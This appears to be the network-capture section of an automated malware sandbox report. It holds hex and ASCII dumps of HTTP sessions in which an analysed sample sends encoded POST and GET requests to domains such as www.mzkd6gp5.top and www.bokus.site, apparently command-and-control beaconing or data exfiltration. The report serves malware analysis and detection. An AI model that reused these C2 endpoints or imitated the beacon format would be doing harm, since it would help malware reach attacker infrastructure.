dc 64 02 96 f3 15 bc 49 4a 42 8a [TRUNCATED]
                                                                          Data Ascii: 266SMs0WPv6@:g;q`|IDDAN{tCu@e]w}]MaosL)M0@`FXX:r<&R#nh@@aUKqhO9Hd-HB85Rv^T2|ek~sh&4GZ=/NI2KE&$4MFsv2A<%:WvLH<WbTKu%J-9/C)EdIJBG}q'(runY][iYB<d:x71`JN/_jn|1vFOz5a}FbN9j4h1CfzuC2pnR<v+RuSCEtnvg:dx~a#Bwz;|{(wl~Zx([{r"!BAonS/wW7|S!y0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          53192.168.11.2049798198.58.118.16780
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:17.670087099 CET528OUTGET /jwa9/?lV=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:17.815334082 CET1289INHTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:51:17 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          connection: close
                                                                          Data Raw: 34 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED]
                                                                          Data Ascii: 495<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437877.0005169428&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICJsVj1uYkViNkJhcGpyQ1lkM3ZwSVU2NWRSVGFvUEsyYzQ4NFo5RExlbFRjcko0cDhoT2lCcGxJMzl6dHpoYWFsNzZxRllLZThvb0pGMjJtSS9KdlJQUjlLWnRFUHNHUFNadnBIejRnS1JiOVJIdGl2ODdTWnd4TXlJaz0mTFNiYVQ9emZ0NExvQnciLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45 [TRUNCATED]
                                                                          Jan 9, 2025 16:51:17.815377951 CET52INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: } </script> </body></html>0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          54192.168.11.2049799104.21.96.180
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:22.958621025 CET795OUTPOST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 5a 65 49 76 53 57 69 51 76 61 4d 32 34 4a 4d 34 50 46 54 48 77 3d 3d
                                                                          Data Ascii: lV=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoZeIvSWiQvaM24JM4PFTHw==
                                                                          Jan 9, 2025 16:51:23.504389048 CET814INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:23 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFs509HqJLvYm79m0vnQyDfLxdTKEfFPP7GSWI5E84fJWyTIVVqEIrhmvbsXom%2BSIpmeBwddYXJmEvuXmDeymdw6IE%2BXBhz70heOb4uN9r4zxw1rWhkFk89r1sEnEEkFCXi1"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff596a0eb3b6075-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118631&min_rtt=118631&rtt_var=59315&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                          Data Ascii: f
                                                                          Jan 9, 2025 16:51:23.504467964 CET105INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                          Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                          Jan 9, 2025 16:51:23.504498005 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          55192.168.11.2049800104.21.96.180
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:25.615835905 CET815OUTPOST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 6e 2f 42 66 68 44 71 33 36 6f 2b 37 77 75 69 4f 64 30 6a 6f 3d
                                                                          Data Ascii: lV=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Qn/BfhDq36o+7wuiOd0jo=
                                                                          Jan 9, 2025 16:51:26.157382965 CET911INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:26 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9YxU0im9%2FgKYglvQzQ1aOytbTHnz8wo03tiSNRr36MRNGZBmLWf9FN2XmJNA585Z1i5FGqtxPgLf8uQY0%2B62nNLGqrwMyk9BWSimeERlNSiyc5fFgz7%2BwHTZu0zvO0gbnBTW"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff596b18b08e81e-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=119801&min_rtt=119801&rtt_var=59900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                          Jan 9, 2025 16:51:26.157428026 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          56192.168.11.2049801104.21.96.180
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:28.271469116 CET2578OUTPOST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2f 75 51 6b 39 6b 43 31 45 6f 63 72 54 68 36 39 77 57 77 32 4c 31 56 4a 4a 34 6b 55 6a 6a 63 55 79 54 71 4c 6f 6f 32 37 6d 6c 44 46 4f 4f 32 47 31 37 51 44 74 66 63 63 55 4b 6b 2b 2f 69 65 41 63 66 48 53 68 73 4c 77 38 52 4c 58 6c 30 76 55 78 6c 33 63 62 79 31 50 53 6b 71 44 72 4b 6b 71 62 43 58 62 6c 61 4a 2f 32 55 32 6a 46 61 43 63 76 33 71 6e 54 43 75 61 58 69 69 68 71 71 51 4f 4a 73 6f 4e 6d 56 35 53 58 45 51 6a 73 61 76 76 44 66 79 32 44 68 4c 4a 59 4a 6c 2f 44 39 61 63 6e 44 62 6d 78 53 44 65 69 72 6e 59 4c 71 33 57 79 68 6a 4a 45 6d 75 34 49 38 32 30 35 67 45 46 31 41 59 33 41 67 35 [TRUNCATED]
                                                                          Data Ascii: lV=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDeUWuHQ77owp1WnzNf7LWJGZvHxMmbhcgi6oBAU0Y20bmCnitj6bgHdYV5OV7b2MErjSYOr1qDlHEBr/+f+LUwj38qrMj20R/uQk9kC1EocrTh69wWw2L1VJJ4kUjjcUyTqLoo27mlDFOO2G17QDtfccUKk+/ieAcfHShsLw8RLXl0vUxl3cby1PSkqDrKkqbCXblaJ/2U2jFaCcv3qnTCuaXiihqqQOJsoNmV5SXEQjsavvDfy2DhLJYJl/D9acnDbmxSDeirnYLq3WyhjJEmu4I8205gEF1AY3Ag5Kkz75E/mEKZjz01eEkFXxojxw0FeKHzJ1V4+ZUcUd4WhaWChZgq4FajJd685UHl+YEXVCbdHd8x6vEraU/inpWqlaWdOxrCRSMHtdn2vcTQAHUqyHTkE1BzBSQbzYwtPJPvLbTJAoMBVFaDvQy/WAgeRlnkW/mkYJmkQmgDzh9i5CFlGT32cTcqgKss25fo4zszhZyoBzKd0fAJEbCRwdyRo+7JlvahzmFHhQB4kG0FlskL9tAQhWfs+5h1UUHP36bT+WbKLjUF3yIFHGBUjCcNh51MBshWtjFQC/gem2ps/AJ7SnwRfryQHVQXmmfILcXp4qYgYNGZY41XVmH+u5plDlO2kZ5APyQc6tntNl2UD1nfOXD59f+bCqKp9Jy950Qhb1Cd05qv0i4Mcpy3XRjkKaCU7+63eEmJjMYWpx2FTIzBZh8YC3Oi2nPPRkeaTWuTr+VM64cmHCt/uzJ34ZuR18nq9HHt3IuWxTA06MuqlP5QTwFPkTEDfsvzViuN4i1rjdpTm3ec1axfUBklphCF3A3XXz09uL2V+9/gxKJXZaVD2MX3HTo7/wJBxnddqzgEsi00VADtBAX+/17I8RjlFYtBBTfVyeVwlP5qxrsay3lk+9J0mINgw8RWgNYY+Dj4qgSrJ585lRJ1YpbM4rhhohgkXpyDAQK [TRUNCATED]
                                                                          Jan 9, 2025 16:51:28.271497011 CET3867OUTData Raw: 32 73 4d 66 6c 4d 35 39 79 41 39 4f 4b 2f 53 52 46 61 37 42 37 57 52 2f 33 30 57 7a 58 67 63 69 6d 76 44 7a 49 71 65 70 35 2f 67 59 68 2b 53 61 2f 61 55 4f 35 70 6c 38 67 68 47 57 51 6b 47 45 4e 4f 63 36 5a 2f 59 33 6b 7a 77 6e 7a 75 4c 50 2b 42
                                                                          Data Ascii: 2sMflM59yA9OK/SRFa7B7WR/30WzXgcimvDzIqep5/gYh+Sa/aUO5pl8ghGWQkGENOc6Z/Y3kzwnzuLP+BQevab1BQL6Wvmcl47ytt7GKrJeTNJpJzYE6UETuJOWsFdwWbFl3nID9aMo0CBS0TKTeDK4KwxIl4j0+KvD0lxrwdVSjpt7Fuu04aOsplYuI5zvlmKj3Ll3NbqhPuNcVEmG8+SdWjMsSaJemQp3ISj3enZcxmO/c8C
                                                                          Jan 9, 2025 16:51:28.271570921 CET1519OUTData Raw: 76 52 51 4c 61 39 33 6a 61 44 34 56 43 2f 53 4a 75 74 67 53 31 52 4d 41 74 71 55 55 56 44 41 72 6b 70 55 4b 31 6c 53 76 69 71 54 50 31 2b 4d 36 4b 61 4a 50 52 30 6d 57 76 30 69 59 4b 31 4a 75 6d 53 36 35 63 6e 66 63 75 2f 4e 7a 62 74 4c 73 6d 72
                                                                          Data Ascii: vRQLa93jaD4VC/SJutgS1RMAtqUUVDArkpUK1lSviqTP1+M6KaJPR0mWv0iYK1JumS65cnfcu/NzbtLsmrjWllI6OhuBcaQyB5TwURNiGw8eO3NDDmbpCqwsYiQyfR2j6odMbHjRT6JGWfuFGVBqe+3m9gUxY3MqdumPy7DIdHTNZzyWHGK+m9AfOzvAISudwld1HGPzswbj/UkvGLH6G6lJDyIyqMzHgNhMq13NOHvE98eaFiT
                                                                          Jan 9, 2025 16:51:28.855375051 CET912INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:28 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ovUOGJDxekgVVdv1hCWr6tjnLgQ3gIe0GGP1WftOKUhkcL6%2FgN5ncrva2n%2BbHRU3LySEvHDHejL72YkN%2F3UdOrXv1gvUauUxw1Z3HNORiIWlvtrjYk7lOOUwXNxcJq8xauNV"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff596c21e47114d-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118941&min_rtt=118941&rtt_var=59470&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7964&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                          Jan 9, 2025 16:51:28.855509043 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          57192.168.11.2049802104.21.96.180
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:30.923999071 CET530OUTGET /3u0p/?lV=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:31.459163904 CET928INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:31 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7dablU66gtaVq1nZcSaPvOgLeiTvvD0R2PcQ0X0dn7n6ftEh0VnU6%2F1BKg%2FPntAXkFOprO3O5cpH3zHDvDA%2F8GFpAGY4uqGnuIt32uDXJk6yQiN%2F5vJP9Eh1FxXd2sLK%2BEp"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff596d2ac92114d-ORD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118780&min_rtt=118780&rtt_var=59390&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 9, 2025 16:51:31.459302902 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          58192.168.11.2049803199.192.21.16980
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:36.651113033 CET789OUTPOST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 56 67 74 66 39 6c 6a 4d 4e 43 68 36 70 66 76 64 49 63 42 76 41 3d 3d
                                                                          Data Ascii: lV=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bVgtf9ljMNCh6pfvdIcBvA==
                                                                          Jan 9, 2025 16:51:36.843951941 CET918INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:36 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
